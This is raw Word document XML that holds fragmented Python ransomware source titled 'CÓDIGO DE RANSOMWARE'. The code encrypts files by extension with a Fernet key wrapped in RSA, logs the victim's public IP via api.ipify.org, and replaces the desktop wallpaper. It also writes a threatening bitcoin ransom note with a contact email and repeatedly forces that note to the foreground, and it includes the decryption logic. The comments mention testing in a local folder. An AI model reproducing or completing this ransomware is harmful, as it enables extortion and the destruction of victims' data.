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FF59" w14:textId="6AF99C02" w:rsidR="00615C83" w:rsidRDefault="00FA0188">
      <w:r>
        <w:t>CÓDIGO DE RANSOMWARE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F74F4F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Imports</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="64E7563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cryptography.fernet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Fernet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target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</w:p>
    <w:p w14:paraId="19E360B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root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4300F83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webbrowser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load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webbrowser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specific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website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bitcoin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173EF2E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ctypes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interact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dlls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change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etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="64F9661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urllib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request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downloading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saving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image</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4ECED9A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requests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make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reqeust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api.ipify.org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target machine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addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="708085D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time.sleep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interval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 &amp;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check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desktop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/files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9BE02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give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time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limit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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF2F7A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subprocess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notepad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open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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1712D5E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win32gui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top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other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windows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="48A590E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Crypto.PublicKey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RSA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B5DE4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Crypto.Random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get_random_bytes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="661CAE7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Crypto.Cipher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AES, PKCS1_OAEP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755D19C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base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB3341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threading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decryption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dekstop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="68E180B6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br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E13AEB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4422923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D4F81B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E2F7B5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exstensions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seek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</w:p>
    <w:p w14:paraId="2E9B347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file_exts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[</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1339535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txt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93EDF5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comment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'png'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only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specific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have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chosen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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0BB37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-and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leaves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other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un-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ecnrypted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etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F0134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'png', </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201F5B3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DFBF69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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76301156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D1614A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322AFE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Key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object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method</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="24C3AA2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None</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0162931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Decrypter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3DB106A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None</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4B5860A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RSA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object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Symmetric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18819A6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</w:t>
      </w:r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None</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3F0D14D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3E486F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'''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directorys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start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Decryption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</w:p>
    <w:p w14:paraId="211B9BC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CAUTION: Do NOT use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self.sysRoot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own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PC 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could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up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messing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up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etc...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B343BD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CAUTION: Play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safe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mini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how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software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works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different</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5DE9A94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CAUTION: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, use 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localRoot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Some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folder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directory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and files in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folders etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6810361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'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F8627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Use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sysroot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absolute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files, etc.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whole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</w:p>
    <w:p w14:paraId="63E5E24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expanduser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'~'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5263AA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Use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localroot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test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softawre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absolute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"test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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A4B40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localRoot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'D</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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:</w:t>
      </w:r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C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oding</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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\P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ython</w:t>
      </w:r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R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ansomWare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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R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ansomWare_Software</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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FA01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l</w:t>
      </w:r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ocalRoot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179AE2C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BF9F62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IP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person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more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analysis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etc. (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Check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have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hit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gov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military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space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LOL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F643F0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publicIP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requests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'https://api.ipify.org'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proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="33D2F717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F5DF76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Generates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[SYMMETRIC KEY]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victim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machine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which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victims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data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E8562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generate_key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763CD63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Generates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safe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base64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encoded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16F254C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  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Fernet.generate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9ABC9B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object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methods</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7E6710E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Fernet(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300656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13FFC0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EB3CAC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fernet(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symmetric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7276AC9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DC7686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'fernet_key.txt'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5FD31E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D712A44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96F2C2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[SYMMETRIC KEY]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was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victim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machine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PUBLIC ASYMMETRIC-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FE7A0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-RSA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was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OUR MACHINE.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later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able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DECRYPT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SYSMETRIC KEY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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659C943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target machine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our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PRIVATE KEY,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etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EFFAB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encrypt_fernet_key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0B7249C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'fernet_key.txt'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fk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A84FE1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fernet_key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fk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1B152F1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'fernet_key.txt'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16BC8B0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RSA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5A2E672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</w:t>
      </w:r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RSA.import_key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public.pem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41392F2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object</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="49D36E3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public_crypter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  PKCS1_OAEP.new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</w:t>
      </w:r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F374B6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1753B29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enc_fernent_key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public_</w:t>
      </w:r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.encrypt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fernet_key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0F60E7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7A96928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enc_fernent_key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D7FF29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dekstop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send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unencrypted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/files back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308ACDB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Desktop/EMAIL_ME.txt'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5803DD1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enc_fernent_key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745D13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Assign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self.key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3C77E93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enc_fernent_key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5F3BED8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Remove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crypter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object</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="191527F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None</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5BAC1915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44B245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[SYMMETRIC KEY]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-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file_path:</w:t>
      </w:r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str:absolute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, C:/Folder/Folder/Folder/Filename.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BE75D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file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02BBE81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DC28CA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Read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data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2B9B91A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0A305B1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C24230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 [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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1160A5E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3CA3B9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data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405D803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.encrypt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E0CFF8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Log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 [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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B371F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encrpyted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628437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1AFDB5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627E15D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data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1A1870E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.decrypt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36B1518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Log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contents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 [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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B914D3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decrpyted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04BC7B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638983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wb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fp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1433167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Write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data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same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filename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overwrite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original file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F1D9C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fp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_data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73D7002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AFEAAB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[SYMMETRIC KEY]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symmetric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was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generated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victim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machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E8B60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89B17A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walk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localRoot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topdown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0E86DD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FC9AB3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6BA30F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FF5B21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split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)[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</w:t>
      </w:r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_exts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6FBF3E3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continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C337A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5A3AA97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_file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783B24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25B90F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file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DD5CDB0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E40D75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@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staticmethod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68920EE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what_is_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bitcoin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65390A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'https://bitcoin.org'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE07E5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Open browser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https://bitcoin.org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know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what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bitcoin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</w:p>
    <w:p w14:paraId="555B306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webbrowser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65DFCF3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EBDBBF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change_desktop_background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4FE0A35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imageUrl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'https://images.idgesg.net/images/article/2018/02/ransomware_hacking_thinkstock_903183876-100749983-large.jpg'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E7D5E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specif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download+save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absolute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path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1406558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Desktop/background.jpg'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520B64D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urllib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request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urlretrieve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imageUrl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A27AB2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SPI_SETDESKWALLPAPER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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDDA8F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Access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dlls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funcionality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changing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dekstop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wallpaper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="18A9107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ctypes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windll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.user32.SystemParametersInfoW(</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA01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SPI_SETDESKWALLPAPER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8E93FD5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742945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ransom_note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7042804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today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strftime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%d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-%B-Y'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2405BD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'RANSOM_NOTE.txt'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'w'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A0F3EF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'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EF3BA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hard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disks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computer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have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been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Military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grade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encryption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algorithm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75CF8EA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way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restore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data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without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special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36A00CD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Only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files!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351A215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67D38F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purchase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restore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data,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please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follow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these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three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easy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steps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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFFC82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BAD76C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1. Email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called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EMAIL_ME.txt at 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Desktop/EMAIL_ME.txt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GetYourFilesBack@protonmail.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B178A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B6E240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 xml:space="preserve">2.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recieve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personal BTC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address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payment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7B6A56A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Once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payment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has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been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completed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send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another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email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GetYourFilesBack@protonmail.com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stating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"PAID".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398AFA3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check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payment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has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been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paid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23AEF19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97627B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3.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receive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KEY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unlock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files. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DF2BE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IMPORTANT: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files, place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desktop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wait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Shortly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after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files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A3A67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135040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WARNING:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E79B1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Do NOT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attempt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software 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obsolete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work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cost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more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unlock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files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25359D7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Do NOT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change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names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mess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run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decryption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software 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cost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more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unlock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files-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E5DAF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high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chance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lose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forever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510DB9D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Do NOT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send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"PAID"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without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paying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price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WILL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up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disobedience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</w:p>
    <w:p w14:paraId="169FB9A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Do NOT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think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won't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delete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files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altogether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away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refuse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pay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 WE WILL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A25D9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7ED317C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19054C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show_ransom_note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59109A3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Open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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF87CC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subprocess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Popen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'notepad.exe'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'RANSOM_NOTE.txt'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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D8C25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count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7DA4D68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37C6DF1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36984D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top_window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win32gui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GetWindowText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win32gui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GetForegroundWindow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())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621A263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top_window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'RANSOM_NOTE - Notepad'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2039CED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note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top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- do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nothing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64C128C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pass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="614570B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40021F4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note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top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-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kill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again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2C77D2B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 so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open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agian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make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sure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ForeGround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(top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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDBBF7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84C7A1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kill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78F5947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Open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note</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004E2CB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2174AD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ransom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subprocess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Popen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'notepad.exe'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'RANSOM_NOTE.txt'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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629E0CF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10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seconds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="646359A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2746A2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count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+=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718993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count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65BA4D9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</w:p>
    <w:p w14:paraId="373F4A5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2138CB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30A79FD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when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un-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placed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dekstop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target machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F69E2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put_me_on_desktop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771DFD5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check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read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self.key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+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self.cryptor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valid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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548C847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files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC19F8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started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78117B3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51B00AC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69993CA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trying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36B8581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ATTACKER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decrypts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symmetric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their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machine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puts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un-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fernet-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59173AA6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sends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a email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victim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They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put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desktop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be-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B31CE2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used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un-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 AT NO POINT DO WE GIVE THEM THE PRIVATE ASSYEMTRIC KEY etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BF159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sysRoot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/Desktop/PUT_ME_ON_DESKTOP.txt'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6DAD520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2D3175B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crypter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Fernet(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D7EDCB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Decrpyt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once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have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found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have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cryptor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correct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key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="66E5C7B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self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_system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82ADD7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decrypted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3F7FFED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</w:p>
    <w:p w14:paraId="2C6076A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0BB53B9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42BADB0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pass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1572767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time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check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file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desktop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ever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10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seconds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6337668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Checking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PUT_ME_ON_DESKTOP.txt'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5F663FA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Would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use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below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in real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life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etc...</w:t>
      </w:r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above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10secs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just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"show" concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A5FE3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~ 3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mins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2B1604B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= 60</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C04CE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mins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= 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A52308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time.sleep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mins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secs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))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1B7364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br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E26BBD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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFFF76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testfile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r'D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:\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Coding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\Python\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RansomWare_Software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\testfile.png</w:t>
      </w:r>
      <w:proofErr w:type="gram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'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC2DFE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B150860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generate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0EF01B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crypt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C21EE8C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CC9509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encrypt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_fernet_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2269C7B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change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_desktop_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E4E07C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what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_is_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bitcoin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28D491E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ransom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13AC60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6CD1633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threading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Thread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</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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_ransom_note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4D979D2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t2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threading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Thread</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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rw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put_me_on_desktop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623383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0308865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</w:t>
      </w:r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1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start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20ED729F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Attack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completed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target machine and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system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5052EEC4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Waiting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attacker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give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target machine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that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will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un-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machine'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189EA71A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</w:t>
      </w:r>
      <w:proofErr w:type="gram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2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start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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197D5861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Target machine has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been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un-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78B44319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'&gt;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RansomWare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Completed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Debugging</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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FA01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Testing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="367F0953" w14:textId="77777777" w:rsidR="00FA0188" w:rsidRPr="00FA0188" w:rsidRDefault="00FA0188" w:rsidP="00FA0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br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="429576B7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FA01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FA0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'__</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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FA0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__'</w:t>
      </w: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7AF821D8" w14:textId="77777777" w:rsidR="00FA0188" w:rsidRPr="00FA0188" w:rsidRDefault="00FA0188" w:rsidP="00F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FA01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A01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03B6DD1" w14:textId="77777777" w:rsidR="00FA0188" w:rsidRDefault="00FA0188"/>
    <w:sectPr w:rsidR="00FA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88"/>
    <w:rsid w:val="003126E2"/>
    <w:rsid w:val="00615C83"/>
    <w:rsid w:val="00D152A4"/>
    <w:rsid w:val="00F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F432"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3A4C4825-5DE6-4686-A6D4-94693C9A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1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1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1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1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1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1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1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1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1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1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1807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JM</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Elías JM</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-04-11T17:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-11T17:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>